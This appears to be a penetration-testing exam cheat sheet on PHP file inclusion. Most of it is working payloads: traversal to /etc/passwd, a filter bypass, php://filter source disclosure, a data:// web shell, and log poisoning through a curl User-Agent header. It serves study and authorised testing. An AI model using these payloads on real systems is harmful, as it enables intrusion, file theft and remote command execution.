File Inclusion

Web

📖 Overview

Local (LFI) and Remote (RFI) File Inclusion: the application passes user-controlled input to an include/require-style call, so an attacker can read arbitrary files, disclose source code, or, with the right wrapper or a poisoned log, execute code.

📋 Cheatsheet

LFI

/page?file=../../../../etc/passwd # Basic directory traversal; add more ../ if the include base sits deeper, extra levels above / are ignored
/page?file=....//....//etc/passwd # Bypasses a filter that strips ../ once: each ....// collapses to ../ after the strip

Wrappers

php://filter/convert.base64-encode/resource=index.php # Read PHP source as base64 instead of executing it; decode with base64 -d
data://text/plain,<?php system($_GET['cmd']);?> # RCE via data wrapper; needs allow_url_include=On, and URL-encode the payload in the request

Log Poisoning

# Poison the Apache access log (the web server user must be able to read it; the path varies, e.g. /var/log/httpd/access_log on RHEL-based systems)
curl -H "User-Agent: <?php system($_GET['cmd']);?>" URL # Inject PHP into User-Agent; keep it syntactically valid, a parse error breaks every later include of the log
# Include the log
/page?file=/var/log/apache2/access.log&cmd=id # Include the poisoned log; PHP executes the injected tag and runs cmd

💻 Command Examples

⚠️ Common Pitfalls

  • Path not deep enough: the include base usually sits below the web root, so use plenty of ../ (extra levels above / are ignored)
  • Null-byte truncation (%00) to drop an appended extension such as .php no longer works: PHP 5.3.4 removed it

💡 Exam Survival Tips

  • Try several wrappers: php://filter works without allow_url_include, data:// needs it
  • Check for readable web server access and error logs to poison, and confirm the include can actually open them

🗺️ Mind Maps